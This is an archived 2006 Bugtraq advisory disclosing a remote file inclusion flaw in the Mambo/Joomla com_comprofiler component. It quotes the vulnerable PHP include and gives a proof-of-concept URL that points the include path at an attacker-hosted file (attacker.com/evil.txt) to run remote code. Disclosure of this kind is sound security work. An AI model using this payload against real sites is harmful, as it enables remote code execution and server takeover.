[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060826034735.18741.qmail@securityfocus.com>
Date: 26 Aug 2006 03:47:35 -0000
From: matdhule@...il.com
To: bugtraq@...urityfocus.com
Subject: Mambo/Joomla com_comprofiler Components <== v1.0 RC 2 Multiple
Remote File Include Vulnerabilities
---------------------------------------------------------------------------
Mambo/Joomla com_comprofiler Components <== v1.0 RC 2 Multiple Remote File Include Vulnerabilities
---------------------------------------------------------------------------
Author : Matdhule
Date : August, 25th 2006
Location : Indonesia, Jakarta
Critical Lvl : Highly critical
Impact : System access
Where : From Remote
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
com_comprofiler Components
Application : com_comprofiler
version : 1.0 RC 2
---------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~~~
in folder com_comprofiler we found vulnerability script plugin.class.php
-----------------------plugin.class.php----------------------
<?php
/**
* Plugin handler
* @package Joomla
* @author various, JoomlaJoe and Beat
*/
require_once( $mosConfig_absolute_path . '/includes/domit/xml_domit_lite_include.php' );
----------------------------------------------------------
Variables $mosConfig_absolute_path are not properly sanitized.
Proof Of Concept:
~~~~~~~~~~~~~~~~
http://[target]/[path]/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= http://attacker.com/evil.txt?
Solution:
~~~~~~~~
sanitize variabel $mosConfig_absolute_path in plugin.class.php
---------------------------------------------------------------------------
Shoutz:
~~~~~~
~ solpot a.k.a chris, J4mbi H4ck3r for the hacking lesson :)
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous
~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama
~ newbie_hacker@...oogroups.com, jasakom_perjuangan@...oogroups.com
~ #nyubi (solpotcrew comunity) #jambihackerlink #e-c-h-o @ irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~~~~
matdhule[at]gmail[dot]com
-------------------------------- [ EOF ] ----------------------------------
Powered by blists - more mailing lists